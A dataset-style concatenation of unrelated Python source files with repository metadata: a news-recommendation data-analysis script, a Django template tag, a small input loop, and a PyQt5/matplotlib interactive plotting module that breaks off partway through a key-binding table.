        'ctW', 'ctp', 'cpQM', 'ctli', 'cQei', 'ctZ', 'cQlMi', 'cQl3i', 'ctG', 'ctlTi', 'cbW', 'cpQ3', 'ctei', 'cpt', 'ctlSi', 'cptb'
    )
    eft_hb_wc = ( # two heavy + boson Wilson Coefficients
        'ctp', 'cpQM', 'cpQ3', 'cpt', 'cptb', 'ctW', 'ctZ', 'cbW', 'ctG'
    )
    eft_2l_wc = ( # two heavy + two lepton Wilson Coefficients
        'cQl3i', 'ctli', 'cQei', 'cQlMi', 'ctlTi', 'ctei', 'ctlSi'
    )
    # Fit only the heavy+boson WCs by default.
    eft = EFT_DC_Prep(part, aux_file, wgt_file, eft_hb_wc)
    #print(eft.wgt_df)
    #print(eft['beta']['ctp'])
    #print(eft['beta']['ctp_ctp'])
    #print(eft['beta']['SM'])
    #print(pd.DataFrame.from_dict({'ctZ':[1,-1], 'ctW': 0}))
    eft.plot_all_eft_scale()
    eft.plot_xsec_eft_scale()
    #eft.plot_all_eft_scale(opt='q')
    #eft.plot_all_eft_scale(opt='p')
    #eft.create_dc_Df()
    ##
    #mc_hist = get_root_hist('h_ttz.root')
    #mc_hist = get_root_hist('h_tth.root')
    #nd_hist, nd_bins, raw_c = eft.getMCshape()
    ###
    #plot4Andrew(mc_hist,nd_hist,nd_bins,raw_c)
| [
"bcaraway@cern.ch"
] | bcaraway@cern.ch |
725c241a20c3a428a6b91bd6ee339be475bbca96 | 9f38512cc6c7ef83cd69c3f679c2f3a855799488 | /utility/dataAnalysis.py | 8f1467a54fb509f221fbe5795918937bbebe0448 | [] | no_license | tangzhenyu/drl_recommendation_system | 1254d17414b497ad0bfe60dcb183e96dab29284c | 8120a01d4f25f91af56b66ae1d21959d60f56331 | refs/heads/master | 2022-12-18T05:10:32.150344 | 2020-09-25T05:02:33 | 2020-09-25T05:02:33 | 293,391,672 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 7,188 | py | from utility.hype_parameters import HypeParameters as hypes
import argparse
import sys
from environment import environment_10_newsTags_tagShared_trueDQN as env
import os
def trainStrToDict(line):
    """Parse a tab-separated line of 'key#value' tokens into a dict.

    Empty lines return {}; blank tokens between tabs are skipped. Only the
    first two '#'-separated fields of each token are used. Raises IndexError
    on a token without '#' (callers wrap parsing in try/except).
    """
    parsed = {}
    if not line:
        return parsed
    for token in line.strip().split("\t"):
        token = token.strip()
        if not token:
            continue
        fields = token.split("#")
        parsed[fields[0]] = fields[1]
    return parsed
def userTags_statistic(userData_path):
    """Scan a user-profile file and write per-user tag statistics to 'userTags.txt'.

    Each input line is 'key#value' pairs (see trainStrToDict) with a 'feature'
    field of space-separated 'tag:weight:type' entries. For every user, the
    tag count and the fraction of tags per type (1=instant, 2=short,
    3=long-old, 5=long-new) are written out. Scanning stops at the first blank
    line (or EOF). Prints the max and average tag count at the end.
    """
    num_user = 0
    max_num_userTags = 0
    num_userTags_total = 0
    # FIX: use context managers — the original never closed the input file.
    with open(userData_path, 'r') as userData_file, open("userTags.txt", 'w') as f:
        while True:
            line = userData_file.readline().strip('\n').strip()
            if not line:
                # Blank line or EOF ends the pass over the data.
                print("one epoch done")
                break
            try:
                elem = trainStrToDict(line)
                uid = elem["uid"]
                # Read to validate the record has a state field (otherwise a
                # KeyError sends the line to the error branch); unused after.
                state = elem["state"]
                feature = elem["feature"]
                features = feature.split(" ")
                instant_tag = []
                short_tag = []
                long_tag_old = []
                long_tag_new = []
                for t in features:
                    tag, tag_w, tag_type = t.split(":")
                    if tag_type == '1':
                        instant_tag.append(t)
                    elif tag_type == '2':
                        short_tag.append(t)
                    elif tag_type == '3':
                        long_tag_old.append(t)
                    elif tag_type == '5':
                        long_tag_new.append(t)
                num_userTags = len(features)
                max_num_userTags = max(max_num_userTags, num_userTags)
                num_userTags_total += num_userTags
                num_user += 1
                # Normalize by recognized tags only; 0 recognized tags raises
                # ZeroDivisionError below and the line is logged as an error.
                norm = len(instant_tag) + len(short_tag) + len(long_tag_old) + len(long_tag_new)
                print('processing ', num_user)
                f.write(str(num_user) + '\t' +
                        uid + '\t' + str(num_userTags) + '\t' +
                        str(len(instant_tag) / norm) + '\t' +
                        str(len(short_tag) / norm) + '\t' +
                        str(len(long_tag_old) / norm) + '\t' +
                        str(len(long_tag_new) / norm) + '\t' +
                        "\n")
            except Exception:
                # FIX: was a bare except (also caught KeyboardInterrupt).
                print('read data error: ', line)
    print("max: ", max_num_userTags)
    # FIX: guard the empty-input case, which previously divided by zero.
    print("ave: ", num_userTags_total / num_user if num_user else 0.0)
def indexSeq_statistic(userEnv):
    """Run one epoch over *userEnv* and dump per-request candidate-list stats
    to 'userIndexSeqs.txt'; print max/average candidate and request counts.

    Each output row: uid, request index, candidate-list length, number of
    requests in the episode, click count, and the log timestamp.
    """
    num_indexSeq_total = 0
    max_num_indexSeq = -10
    num_request_total = 0
    max_num_request = -10
    num_user = 0.
    epoch = 0
    uid_count = 0
    count_indseq = 0
    f = open("userIndexSeqs.txt", 'w')
    while epoch < 1:
        # t_read_s=time.time()
        _ = userEnv.reset()
        # t_read_e=time.time()-t_read_s
        # print('read time:',t_read_e)
        if userEnv.one_epoch_done:
            epoch += 1
            uid_count = 0
        if len(userEnv.episode_record) == 0:
            #print('the episode is not valid')
            continue # number of valid data is 0
        else:
            uid_count += 1
            print('epoch: ', epoch, '\tuid_count: ', uid_count,'\tlen:',len(userEnv.episode_record))
        '''
        while uid_count < 100:
            state=userEnv.reset()
            uid_count+=1
        '''
        uid = userEnv.episode_record[0].userID
        num_request = len(userEnv.episode_record)
        num_request_total += num_request
        max_num_request = max(max_num_request, num_request)
        # One output row per request in the episode.
        for t in range(len(userEnv.episode_record)):
            num_indexSeq = len(userEnv.episode_record[t].indexSeq)
            max_num_indexSeq = max(max_num_indexSeq, num_indexSeq)
            num_indexSeq_total += num_indexSeq
            num_click=len(userEnv.episode_record[t].click_newsIDs)
            log_time=userEnv.episode_record[t].log_time
            f.write(uid + '\t' + str(t) + '\t' + str(num_indexSeq) +
                    '\t'+str(len(userEnv.episode_record))+
                    '\t'+str(num_click)+
                    '\t'+log_time+"\n")
            count_indseq += 1
        num_user += 1
    print("max: ", max_num_indexSeq)
    print("ave: ", num_indexSeq_total / count_indseq)
    print("max: ", max_num_request)
    print("ave: ", num_request_total / num_user)
    f.close()
def showValidStates(userEnv, args):
    """Replay one epoch of recorded episodes and print discounted rewards.

    For each episode, converts the recorded recommendations back into index
    actions, steps the environment with them, and accumulates
    gamma-discounted reward.  *args* is currently unused.
    NOTE(review): relies on module-level ``hypes`` (gamma) imported elsewhere
    in this file — not visible here; confirm it is in scope.
    """
    # Initialize target network weights
    # actor_Q.update_target_network()
    epoch = 0
    uid_count = 0
    while epoch < 1:
        # t_read_s=time.time()
        state = userEnv.reset()
        # t_read_e=time.time()-t_read_s
        # print('read time:',t_read_e)
        uid_count += 1
        # print('epoch: ', epoch, '\tuid_count: ', uid_count)
        if userEnv.one_epoch_done:
            epoch += 1
            uid_count = 0
        if len(userEnv.episode_record) == 0:
            # print('the episode is not valid')
            continue  # number of valid data is 0
        # if(uid_count<=3):
        # continue
        '''
        while uid_count < 100:
            state=userEnv.reset()
            uid_count+=1
        '''
        print('valid states: ', len(userEnv.episode_record))
        episode_reward = 0
        for t in range(len(userEnv.episode_record)):
            # read action from user record
            picked_newsIDs = userEnv.episode_record[t].recommend_newsIDs
            valid = True
            action = []
            # An episode is valid only if every recommended ID appears in
            # the candidate indexSeq; otherwise skip the whole episode.
            for id in picked_newsIDs:
                if (id not in userEnv.episode_record[t].indexSeq):
                    valid = False
                    break
                else:
                    a = userEnv.episode_record[t].indexSeq.index(id)
                    action.append(a)
            if valid == False:
                print('the episode is not valid,')
                break
            next_state, reward, done = userEnv.step(action, t)
            # Discounted return: sum of gamma^t * reward over the episode.
            episode_reward += pow(hypes.gamma, t) * reward
        print('episode_reward: ', episode_reward)
def main(args):
    """Build the recommendation environment from CLI paths and run stats.

    NOTE(review): depends on module-level ``env`` and ``hypes`` imported
    elsewhere in this file (not visible in this chunk).
    """
    newsTag_dict_path=args.data_news
    user_records_path=args.data_user
    data_path = env.DataPaths(newsTag_dict_path, user_records_path)
    userEnv = env.Environment(data_path, max_newsTag_num=hypes.max_newsTag_num,
                              max_userTags_num=hypes.max_userTags_num,
                              max_candidates_num=hypes.max_candidates_num)
    # showValidStates(userEnv,args)
    #userTags_statistic(args.user_records_path)
    indexSeq_statistic(userEnv)
def parse_arguments(argv):
    """Parse *argv* (list of argument strings, excluding the program name).

    Recognizes ``--data_user`` and ``--data_news`` path options and returns
    the resulting argparse Namespace.
    """
    arg_parser = argparse.ArgumentParser()
    for flag, default_path in (
            ('--data_user', 'D:download/data/2019-01-21_13-00/userOnehot'),
            ('--data_news', 'D:download/data/2019-01-21_13-00/newsOnehot')):
        arg_parser.add_argument(flag, type=str, help='', default=default_path)
    return arg_parser.parse_args(argv)
# Script entry point: parse CLI paths and run the statistics dump.
if __name__ == '__main__':
    main(parse_arguments(sys.argv[1:]))
| [
"tangzhenyu_2012@163.com"
] | tangzhenyu_2012@163.com |
51e143411179c72bfa7bbfbd9bd7d7bd04103a16 | 727f1bc2205c88577b419cf0036c029b8c6f7766 | /out-bin/py/google/fhir/models/model_test.runfiles/com_google_fhir/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/contrib/quantize/python/common.py | 78f1c2bb4f48920369f7dab6876ead2faead3890 | [
"Apache-2.0"
] | permissive | rasalt/fhir | 55cf78feed3596a3101b86f9e9bbf6652c6ed4ad | d49883cc4d4986e11ca66058d5a327691e6e048a | refs/heads/master | 2020-04-13T00:16:54.050913 | 2019-01-15T14:22:15 | 2019-01-15T14:22:15 | 160,260,223 | 0 | 0 | Apache-2.0 | 2018-12-03T22:07:01 | 2018-12-03T22:07:01 | null | UTF-8 | Python | false | false | 185 | py | /home/rkharwar/.cache/bazel/_bazel_rkharwar/c4bcd65252c8f8250f091ba96375f9a5/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/contrib/quantize/python/common.py | [
"ruchika.kharwar@gmail.com"
] | ruchika.kharwar@gmail.com |
1a71e0581d50bc3a92a7aa6af1f7fc8eafe2ba11 | c2a7d4b6a55c2c5c4aeae94819e5980bd76e0455 | /conversations/templatetags/users_on.py | 2f3b0bd59f7fcdcb49d890b8f6ce117ae000decb | [] | no_license | mnlx/portfolio_site | aecd4b501e3e61325175006eb3479f499f40ffa4 | e0511bf983af6dbf477cfba395df55a0484c9b08 | refs/heads/master | 2021-01-02T22:48:28.534922 | 2017-09-20T16:55:13 | 2017-09-20T16:55:13 | 99,397,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | py | from django import template
from django.shortcuts import render,HttpResponse,HttpResponseRedirect
from rango.models import User
register = template.Library()
import datetime
@register.inclusion_tag('conversations/templatetags/users_on.html')
def users_on():
    """Inclusion tag rendering a list of users as "online friends".

    NOTE(review): simply takes the first five ``User`` rows in default
    ordering — no actual online-status filtering; confirm intended behavior.
    """
    # conv = Conversations.objects.get(pk=1)
    friends = User.objects.all()[:5]
    friends_name_list =[(x.first_name,x.last_name) for x in friends]
    return {'online_friends' : friends_name_list}
@register.simple_tag
def current_time(format_string):
    """Simple tag: return the current local time formatted per *format_string*."""
    return datetime.datetime.now().strftime(format_string)
"andreduarte2010@gmail.com"
] | andreduarte2010@gmail.com |
8ddc4ab7c2bd85798985046714aa9e09e58a8dfc | 0d8a5beac8540ce21c32b8a03645355c008839f5 | /Quiz-4.py | a14f20b92c901d3fbae529eaaa823ffd3675f4aa | [] | no_license | sanketkothiya/Learn-Python | 5a4728d72a93fa8734521cd1aa8672874ef54cab | 8fe4a322c0cd451c26a31f20355c4d377e24c5e7 | refs/heads/master | 2022-12-24T11:07:21.324789 | 2020-10-01T15:30:05 | 2020-10-01T15:30:05 | 300,320,777 | 0 | 0 | null | 2020-10-01T15:04:59 | 2020-10-01T15:04:59 | null | UTF-8 | Python | false | false | 211 | py | i=0
# Repeatedly prompt for an integer until the user enters one greater than 100.
while(True):
    # NOTE(review): int() raises ValueError on non-numeric input — unhandled.
    n1 = int(input("Enter your Number Here:\n"))
    if(n1>100):
        print("you entered a number greater than 100\n")
        break
    else:
        print("try again!\n")
        continue
| [
"jigardonga912@gmail.com"
] | jigardonga912@gmail.com |
39c76491e27e10c613686ad4acbd06e41aaf3375 | 24a1f9fd62f9c3ab0c14016c71518809f1e257ba | /django_postges_lookups_any/models.py | 913a805f81bb237fb1597fa6849187a1ed3b2626 | [
"MIT"
] | permissive | alexshin/django-postges-lookups-any | 2877ca9093d262e8f9569c71c7ee3274508c8371 | 4b58813d70b11ff7fe8084b04b2da3d1e8675708 | refs/heads/main | 2023-03-02T20:14:05.519980 | 2021-02-08T21:54:14 | 2021-02-08T21:54:14 | 337,203,035 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42 | py | import django_postges_lookups_any.lookups
| [
"alex.shinkevich@gmail.com"
] | alex.shinkevich@gmail.com |
e59a019df509667298df3c5a87fda18bc0f8e7d0 | 0c72645ec5082afe0141b06c36d569d4b68570d3 | /misc/python/plotinteract.py | 3be0824e966bc85dfdb79fab5551d8f66e573e27 | [] | no_license | wilywampa/vimconfig | 3b681309c229449741a7d2d38f309e92c633d046 | e436ce65348f053b7c580492f084431a5f23728b | refs/heads/master | 2021-04-19T00:21:09.509827 | 2018-08-13T04:57:08 | 2018-08-13T04:57:08 | 27,682,082 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 58,205 | py | # -*- coding: utf-8 -*-
from __future__ import division, print_function
import ast
import collections
import copy
import logging
import matplotlib as mpl
import numpy as np
import re
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import pyqtSignal
from collections import OrderedDict
from cycler import cycler
from itertools import chain, count, cycle, tee
from matplotlib.backend_bases import key_press_handler
from matplotlib.backends.backend_qt5agg import (FigureCanvasQTAgg as
FigureCanvas,
NavigationToolbar2QT
as NavigationToolbar)
from matplotlib.figure import Figure
from mplpicker import picker
from six import string_types, text_type
# Module-level logger used for debug tracing throughout this file.
logger = logging.getLogger('plotinteract')
# Python 2 exposes `unicode`; fall back to `str` on Python 3.
try:
    QString = unicode
except NameError:
    QString = str
# Line2D properties exposed for editing in the PropertyEditor table.
PROPERTIES = ('color', 'linestyle', 'linewidth', 'alpha', 'marker',
              'markersize', 'markerfacecolor', 'markevery', 'antialiased',
              'dash_capstyle', 'dash_joinstyle', 'drawstyle', 'fillstyle',
              'markeredgecolor', 'markeredgewidth', 'markerfacecoloralt',
              'pickradius', 'solid_capstyle', 'solid_joinstyle')
# Short matplotlib-style aliases accepted in user-supplied kwargs/props.
ALIASES = dict(aa='antialiased', c='color', ec='edgecolor', fc='facecolor',
               ls='linestyle', lw='linewidth', mew='markeredgewidth')
# Named scale factors available in the scale boxes: prefer scipy's physical
# constants when scipy is installed, else just degree/radian conversions.
try:
    import scipy.constants as const
except ImportError:
    CONSTANTS = dict(r2d=np.rad2deg(1), d2r=np.deg2rad(1))
else:
    CONSTANTS = {k: v for k, v in const.__dict__.items()
                 if isinstance(v, float)}
    CONSTANTS.update(dict(d2r=const.degree,
                          nmi=const.nautical_mile,
                          r2d=1.0 / const.degree,
                          psf=const.pound_force / (const.foot ** 2)))
# macOS reports the physical Control key as MetaModifier in Qt.
if sys.platform == 'darwin':
    CONTROL_MODIFIER = QtCore.Qt.MetaModifier
else:
    CONTROL_MODIFIER = QtCore.Qt.ControlModifier
# Matches a plain Python identifier (keys needing no substitution in eval).
IDENTIFIER_RE = re.compile('^[A-Za-z_][A-Za-z0-9_]*$')
# Matches dotted identifier chains when suggesting key completions.
KEYWORDS_RE = re.compile(r'\b[a-zA-Z_]\w*(?:\.[a-zA-Z_]\w*)*\.?')
# Result of DataObj.eval_key: evaluated value, success flag, warning strings.
EvalResult = collections.namedtuple('EvalResult', 'value ok warnings')
def flatten(d, ndim=None, prefix=''):
    """Join nested keys with '.' and unstack arrays.

    Nested mappings are flattened recursively ({'a': {'b': v}} ->
    {'a.b': v}).  Array values with more than *ndim* dimensions are split
    along their first axis into 'key[0]', 'key[1]', ... entries.  *ndim*
    defaults to the smallest dimensionality of any array value in *d*.
    """
    # collections.Mapping was removed from the collections namespace in
    # Python 3.10; use collections.abc when available (Python 2 lacks .abc).
    Mapping = getattr(collections, 'abc', collections).Mapping
    if ndim is None:
        ndim = next(iter(sorted(
            len(v.shape) for v in d.values() if hasattr(v, 'dtype'))), None)
    out = {}
    for key, value in d.items():
        key = (prefix + '.' if prefix else '') + key
        if isinstance(value, Mapping):
            out.update(flatten(value, ndim=ndim, prefix=key))
        else:
            out[key] = value
            if hasattr(value, 'dtype') and len(value.shape) > ndim:
                # Unstack along axis 0 until every piece is down to ndim dims.
                queue = [key]
                while queue:
                    key = queue.pop()
                    array = out.pop(key)
                    new = {key + '[%d]' % i: a for i, a in enumerate(array)}
                    out.update(new)
                    queue.extend(q for q in new if len(new[q].shape) > ndim)
    return out
def isiterable(obj):
    """Check if an object is iterable (but not a string)."""
    if hasattr(obj, '__iter__'):
        return not isinstance(obj, string_types)
    return False
def unique(seq):
    """Yield the elements of *seq* in order, skipping repeats."""
    emitted = set()
    for element in seq:
        if element in emitted:
            continue
        emitted.add(element)
        yield element
def nth_color_value(c):
    """Resolve a matplotlib 'CN' shorthand (e.g. 'C0') to a concrete color.

    NOTE(review): only reads c[1], so a single digit N is assumed — 'C10'
    would be misparsed as 'C1'; confirm callers never pass two digits.
    """
    prop_cycler = mpl.rcParams['axes.prop_cycle']
    # Fall back to black when the active prop cycle defines no colors.
    colors = prop_cycler.by_key().get('color', ['k'])
    return colors[int(c[1]) % len(colors)]
def props_repr(value):
    """repr() for property values; on Python 2 drops the u'' unicode prefix.

    The isinstance pair is only true on Python 2 (unicode but not str);
    on Python 3 this is a plain repr().
    """
    if isinstance(value, text_type) and not isinstance(value, str):
        value = str(value)
    return repr(value)
def process_props_format(props):
    """Parse a matplotlib format string (e.g. 'r--o') into a props dict.

    NOTE(review): uses the private helper mpl.axes._base._process_plot_format,
    which may change between matplotlib versions.
    """
    props = dict(zip(('linestyle', 'marker', 'color'),
                     mpl.axes._base._process_plot_format(props)))
    # Drop entries the format string did not actually specify.
    for key, value in list(props.items()):
        if value is None or value == 'None':
            del props[key]
    return props
def dict_repr(d, top=True):
    """Format *d* as keyword-argument text; nested dicts become dict(...) calls."""
    if isinstance(d, dict):
        body = ', '.join('{}={}'.format(k, dict_repr(v, False))
                         for k, v in d.items())
        return body if top else 'dict({})'.format(body)
    if isinstance(d, string_types):
        return repr(str(d))
    return repr(d)
class KeyHandlerMixin(object):
    """Mixin for Qt edit widgets adding Ctrl-key shortcuts and signals.

    Key presses are translated into the signals below (consumed by the
    owning Interact window) or into cursor/selection edits on the wrapped
    line edit.  Subclasses must provide a ``completer`` attribute.
    """
    # Parameterless signals relayed to the owning window.
    axisEqual = pyqtSignal()
    closed = pyqtSignal()
    duplicate = pyqtSignal()
    editProps = pyqtSignal()
    editCdata = pyqtSignal()
    relabel = pyqtSignal()
    remove = pyqtSignal()
    returnPressed = pyqtSignal()
    sync = pyqtSignal()
    syncAxis = pyqtSignal()
    tabPressed = pyqtSignal(int)  # +1 for Tab, -1 for Shift-Tab
    twin = pyqtSignal()
    xlim = pyqtSignal()
    ylim = pyqtSignal()
    def __init__(self, *args, **kwargs):
        # 'parent' is required and must be the owning widget.
        self.parent = kwargs['parent']
        super(KeyHandlerMixin, self).__init__(*args, **kwargs)
        # QComboBox exposes lineEdit(); a QLineEdit is its own editor.
        self._lineEdit = self.lineEdit() if hasattr(self, 'lineEdit') else self
    def select_all(self, event):
        """Select the whole text in the wrapped line edit."""
        return self._lineEdit.selectAll()
    def quit(self, event):
        """Close this window, then walk up .parent to close the Interact app."""
        self.closed.emit()
        self.window().close()
        while not isinstance(self, Interact):
            try:
                self = self.parent
            except AttributeError:
                return
        self._close()
    def move_cursor(self, event):
        """Handle Home/End (with optional Shift-selection); True if handled."""
        if event.key() == QtCore.Qt.Key_Home:
            if event.modifiers() == QtCore.Qt.ShiftModifier:
                self._lineEdit.cursorBackward(True, len(self._lineEdit.text()))
            else:
                self._lineEdit.setCursorPosition(0)
        elif event.key() == QtCore.Qt.Key_End:
            if event.modifiers() == QtCore.Qt.ShiftModifier:
                self._lineEdit.cursorForward(True, len(self._lineEdit.text()))
            else:
                self._lineEdit.setCursorPosition(len(self._lineEdit.text()))
        else:
            return False
        return True
    def delete_word(self, event):
        """Ctrl-W: delete the selection, or the word before the cursor."""
        if self._lineEdit.selectionStart() == -1:
            self._lineEdit.cursorWordBackward(True)
        self._lineEdit.backspace()
    def event(self, event):
        # Maps Ctrl-<key> either to a bound method (called with the event)
        # or to a signal name (looked up and emitted on TypeError below).
        control_actions = {
            QtCore.Qt.Key_A: self.select_all,
            QtCore.Qt.Key_D: 'remove',
            QtCore.Qt.Key_E: 'axisEqual',
            QtCore.Qt.Key_L: 'relabel',
            QtCore.Qt.Key_N: 'duplicate',
            QtCore.Qt.Key_P: 'editProps',
            QtCore.Qt.Key_Q: self.quit,
            QtCore.Qt.Key_S: 'sync',
            QtCore.Qt.Key_T: 'twin',
            QtCore.Qt.Key_W: self.delete_word,
            QtCore.Qt.Key_X: 'xlim',
            QtCore.Qt.Key_Y: 'ylim',
            QtCore.Qt.Key_Return: 'sync',
        }
        if event.type() == QtCore.QEvent.KeyPress:
            logger.debug('KeyPress %s', next(
                (k for k, v in QtCore.Qt.__dict__.items() if v == event.key()),
                None))
            if (event.modifiers() == CONTROL_MODIFIER and
                    event.key() in control_actions):
                action = control_actions[event.key()]
                # Strings are signal names: calling them raises TypeError,
                # so fall back to emitting the attribute of that name.
                try:
                    action(event)
                except TypeError:
                    getattr(self, action).emit()
                return True
            elif (event.modifiers() ==
                  CONTROL_MODIFIER | QtCore.Qt.ShiftModifier and
                  event.key() == QtCore.Qt.Key_C):
                self.editCdata.emit()
            elif (event.modifiers() ==
                  CONTROL_MODIFIER | QtCore.Qt.ShiftModifier and
                  event.key() == QtCore.Qt.Key_S):
                self.syncAxis.emit()
            elif event.key() in (QtCore.Qt.Key_Home,
                                 QtCore.Qt.Key_End):
                return self.move_cursor(event)
            elif event.key() == QtCore.Qt.Key_Return:
                self.returnPressed.emit()
            elif self.completer.popup().viewport().isVisible():
                # Tab/Backtab cycle through the open completion popup.
                if event.key() == QtCore.Qt.Key_Tab:
                    self.tabPressed.emit(1)
                    return True
                elif event.key() == QtCore.Qt.Key_Backtab:
                    self.tabPressed.emit(-1)
                    return True
        # NOTE(review): several branches above emit a signal without
        # returning True, so the event also reaches the base handler —
        # presumably intentional; confirm before changing.
        return super(KeyHandlerMixin, self).event(event)
class KeyHandlerLineEdit(KeyHandlerMixin, QtWidgets.QLineEdit):
    """QLineEdit with the shared shortcut/signal handling from KeyHandlerMixin."""
    pass
class TabCompleter(QtWidgets.QCompleter):
    """QCompleter with Tab/Shift-Tab cycling and explicit confirm-on-Return.

    ``skip``/``skip_text`` track the currently highlighted (but not yet
    accepted) popup entry so it can be committed when the box loses focus.
    """
    def __init__(self, words, *args, **kwargs):
        QtWidgets.QCompleter.__init__(self, words, *args, **kwargs)
        self.setMaxVisibleItems(50)
        self.words = words
        self.skip = False
        self.skip_text = None
        self.popup().activated.connect(self.confirm)
    def set_textbox(self, textbox):
        """Attach *textbox* and wire its tab/close/return signals to us."""
        self.textbox = textbox
        self.textbox.tabPressed.connect(self.select_completion)
        self.textbox.closed.connect(self.close_popup)
        self.textbox.returnPressed.connect(self.confirm)
    def select_completion(self, direction):
        """Move the popup selection by *direction* rows (wraps around)."""
        if not self.popup().selectionModel().hasSelection():
            if direction == 0:
                return
            direction = 0
        self.setCurrentRow((self.currentRow() + direction) %
                           self.completionCount())
        self.popup().setCurrentIndex(
            self.completionModel().index(self.currentRow(), 0))
    def close_popup(self):
        """Commit the current selection (if visible) and close the popup."""
        popup = self.popup()
        if popup.isVisible():
            self.confirm()
            popup.close()
    def confirm(self):
        """Emit activated() with the textbox text or the highlighted entry."""
        logger.debug('TabCompleter confirm')
        try:
            text = text_type(self.textbox.currentText())
        except AttributeError:
            # Plain QLineEdit has no currentText(); fall back to the last
            # highlighted popup entry, if any.
            if self.skip_text is not None:
                self.skip = True
                self.activated.emit(self.skip_text)
        else:
            self.activated.emit(text)
class CustomQCompleter(TabCompleter):
    """Completer filtering on space-separated include / '!'-prefixed exclude
    terms; when nothing matches, suggests dotted-key expansions instead.
    """
    def __init__(self, parent, *args, **kwargs):
        super(CustomQCompleter, self).__init__(parent, *args, **kwargs)
        self.parent = parent
        self.local_completion_prefix = ''
        self.source_model = None
        self.filterProxyModel = QtCore.QSortFilterProxyModel(self)
        self.usingOriginalModel = False
        # Sort key comes from the Interact window when reachable.
        try:
            self.sortkey = parent.parent.sortkey
        except AttributeError:
            self.sortkey = str.lower
    def setModel(self, model):
        """Install *model* behind a fresh filtering proxy."""
        self.source_model = model
        self.filterProxyModel = QtCore.QSortFilterProxyModel(self)
        self.filterProxyModel.setSourceModel(self.source_model)
        super(CustomQCompleter, self).setModel(self.filterProxyModel)
        self.usingOriginalModel = True
    def updateModel(self):
        """Re-apply the current prefix regex to the proxy model."""
        if not self.usingOriginalModel:
            self.filterProxyModel.setSourceModel(self.source_model)
        # Smart case: case-sensitive only when the pattern has an uppercase.
        pattern = QtCore.QRegExp(
            self.local_completion_prefix,
            QtCore.Qt.CaseSensitive if re.search(
                '[A-Z]', self.local_completion_prefix)
            else QtCore.Qt.CaseInsensitive,
            QtCore.QRegExp.RegExp)
        self.filterProxyModel.setFilterRegExp(pattern)
    def splitPath(self, path):
        """Build the filter regex from *path*; always returns [] (we filter
        via the proxy model rather than Qt's path splitting)."""
        # Split on unescaped whitespace; '\ ' escapes a literal space.
        words = [text_type(QtCore.QRegExp.escape(word.replace(r'\ ', ' ')))
                 for word in re.split(r'(?<!\\)\s+', text_type(path))]
        includes = [re.sub(r'^\\\\!', '!', word) for word in words
                    if not word.startswith('!')]
        excludes = [word[1:] for word in words
                    if len(word) > 1 and word.startswith('!')]
        # All includes as lookaheads, all excludes as negative lookaheads.
        self.local_completion_prefix = QString(
            '^' + ''.join('(?=.*%s)' % word for word in includes) +
            ''.join('(?!.*%s)' % word for word in excludes) + '.+')
        self.updateModel()
        if self.completionCount() == 0:
            self.local_completion_prefix = path
            if self.filterProxyModel.rowCount() == 0:
                logger.debug('rowCount == 0')
                completions = set()
                model = self.source_model
                if model:
                    # Find keys that complete any partial key in path
                    keys = [model.data(model.index(i, 0))
                            for i in range(model.rowCount())]
                    for m in KEYWORDS_RE.finditer(path):
                        word = m[0]
                        logger.debug('word = %s', m[0])
                        if word in keys:
                            continue
                        for key in keys:
                            if key.lower().startswith(word.lower()):
                                # Offer the full key plus every dotted prefix
                                # at least as long as the typed word.
                                c = path[:m.start()] + key + path[m.end():]
                                while '.' in c and len(c) >= len(word):
                                    completions.add(c)
                                    c = c.rpartition('.')[0]
                                if len(c) >= len(word):
                                    completions.add(c)
                logger.debug('completions = %r', completions)
                self.usingOriginalModel = False
                completions = sorted(completions, key=self.sortkey)
                self.filterProxyModel.setSourceModel(
                    QtCore.QStringListModel(completions))
                self.filterProxyModel.setFilterRegExp(QtCore.QRegExp('.*'))
                return []
        return []
class AutoCompleteComboBox(QtWidgets.QComboBox):
    """Editable combo box wired to a CustomQCompleter over its own model."""
    def __init__(self, *args, **kwargs):
        super(AutoCompleteComboBox, self).__init__(*args, **kwargs)
        self.setEditable(True)
        self.setInsertPolicy(self.NoInsert)
        self.completer = CustomQCompleter(self)
        self.completer.setCompletionMode(QtWidgets.QCompleter.PopupCompletion)
        self.setCompleter(self.completer)
    def setModel(self, strList):
        """Replace the item list with *strList* and refresh the completer."""
        self.clear()
        self.insertItems(0, strList)
        self.completer.setModel(self.model())
class KeyHandlerComboBox(KeyHandlerMixin, AutoCompleteComboBox):
    """Auto-completing combo box with the shared KeyHandlerMixin shortcuts."""
    pass
class PropertyEditor(QtWidgets.QTableWidget):
    """Two-column table for editing the Line2D properties of one DataObj.

    Closing/hiding the editor triggers a redraw in the parent Interact
    window; Ctrl shortcuts navigate cells and cycle between datasets.
    """
    def __init__(self, parent, *args, **kwargs):
        super(PropertyEditor, self).__init__(*args, **kwargs)
        self.setFixedSize(300, 400)
        self.setSizePolicy(QtWidgets.QSizePolicy.Expanding,
                           QtWidgets.QSizePolicy.Expanding)
        self.setColumnCount(2)
        self.setHorizontalHeaderLabels(['property', 'value'])
        self.parent = parent
        self.dataobj = None  # DataObj currently being edited
        self.setRowCount(len(PROPERTIES))
        self.setCurrentCell(0, 1)
        self.horizontalHeader().setSectionResizeMode(
            QtWidgets.QHeaderView.Stretch)
        self.horizontalHeader().setStretchLastSection(True)
        self.move(0, 0)
    def closeEvent(self, event):
        # Redraw so edited properties take effect when the editor goes away.
        self.parent.draw(keeplims=True)
    def hideEvent(self, event):
        self.parent.draw(keeplims=True)
    def confirm(self, draw=True):
        """Commit the in-progress cell edit (by reselecting the cell)."""
        cell = self.currentRow(), self.currentColumn()
        self.setCurrentItem(None)
        self.setCurrentCell(*cell)
        if draw:
            self.parent.draw(keeplims=True)
    def cycle_editors(self, direction):
        """Open the editor for the next/previous dataset in the parent."""
        self.confirm(draw=False)
        try:
            index = (self.parent.datas.index(
                self.dataobj) + direction) % len(self.parent.datas)
        except ValueError:
            index = 0
        self.parent.datas[index].edit_props()
    # Ctrl-key bindings; each value is invoked with the editor instance.
    control_actions = {
        QtCore.Qt.Key_J: lambda self: self.focusNextPrevChild(True),
        QtCore.Qt.Key_K: lambda self: self.focusNextPrevChild(False),
